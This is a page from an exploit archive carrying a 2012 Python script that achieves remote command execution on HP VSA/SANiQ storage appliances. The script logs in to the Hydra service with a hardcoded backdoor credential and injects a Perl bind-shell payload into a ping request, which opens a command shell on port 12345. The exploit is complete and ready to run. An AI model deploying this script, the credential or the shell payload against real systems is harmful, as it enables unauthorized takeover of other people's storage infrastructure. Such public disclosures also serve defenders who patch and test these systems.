HP VSA Command Execution

HP VSA Command Execution: Posted May 18, 2012; Authored by Nicolas Gregoire; HP VSA remote command execution exploit.; tags | exploit, remote; SHA-256 | e2634c82bf61b7660279ef87efb9959dc4f17ce4f09dbbb9b22dc962a374b58e; Download | Favorite | View

HP VSA Command Execution

#!/usr/bin/python
 
''' ==================================
          Pseudo documentation
================================== '''
 
# HP VSA / SANiQ Hydra client
# Nicolas Grégoire <nicolas.gregoire@agarri.fr>
# v0.5
 
''' ==================================
          Target information
================================== '''
 
HOST = '192.168.201.11' # The remote host
PORT = 13838        # The hydra port
 
''' ==================================
             Imports
================================== '''
 
import getopt
import re
import sys
import binascii
import struct
import socket
import os
 
''' ==================================
        Define functions
================================== '''
 
# Some nice formatting
def zprint(str):
    print '[=] ' + str
 
# Define packets
def send_Exec():
    zprint('Send Exec')
     
    # RESTRICTIONS
    # You can't use "/" in the payload
    # No Netcat/Ruby/PHP, but telnet/bash/perl are available
 
    # METASPLOIT PAYLOAD
    cmd = "perl -MIO -e '$p=fork();exit,if$p;$c=new IO::Socket::INET(LocalPort,12345,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>'"
 
    # COMMAND INJECTION BUG
    data = 'get:/lhn/public/network/ping/127.0.0.1/foobar;' + cmd + '/'
 
    # EXPLOIT
    zprint('Now connect to port 12345 of machine ' + str(HOST))
    send_packet(data)
 
def send_Login():
    zprint('Send Login')
    data = 'login:/global$agent/L0CAlu53R/Version "8.5.0"' # Backdoor
    send_packet(data)
 
# Define the sending function
def send_packet(message):
 
    # Add header
    ukn1 = '\x00\x00\x00\x00\x00\x00\x00\x01'
    ukn2 = '\x00\x00\x00\x00' + '\x00\x00\x00\x00\x00\x00\x00\x00' + '\x00\x00\x00\x14\xff\xff\xff\xff'
    message = message + '\x00'
    data = ukn1 + struct.pack('!I', len(message)) + ukn2 + message
 
    # Send & receive
    s.send(data)
    data = s.recv(1024)
    zprint('Received : [' + data + ']')
 
''' ==================================
           Main code
================================== '''
 
# Print bannner
zprint('HP Hydra client')
zprint('Attacking host ' + HOST + ' on port ' + str(PORT))
 
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(30)
s.connect((HOST, PORT))
 
# Attack !
send_Login()
send_Exec()
 
# Deconnect
s.close
 
# Exit
zprint('Exit')

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 98 files
indoushka 37 files
Gentoo 29 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 12 files
Jim Blankendaal 11 files
Apple 10 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,084)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,534)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,560)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,418)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,704)
UNIX (9,432)
UnixWare (187)
Windows (6,668)
Other

HP VSA Command Execution

HP VSA Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP VSA Command Execution

Share This

HP VSA Command Execution

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems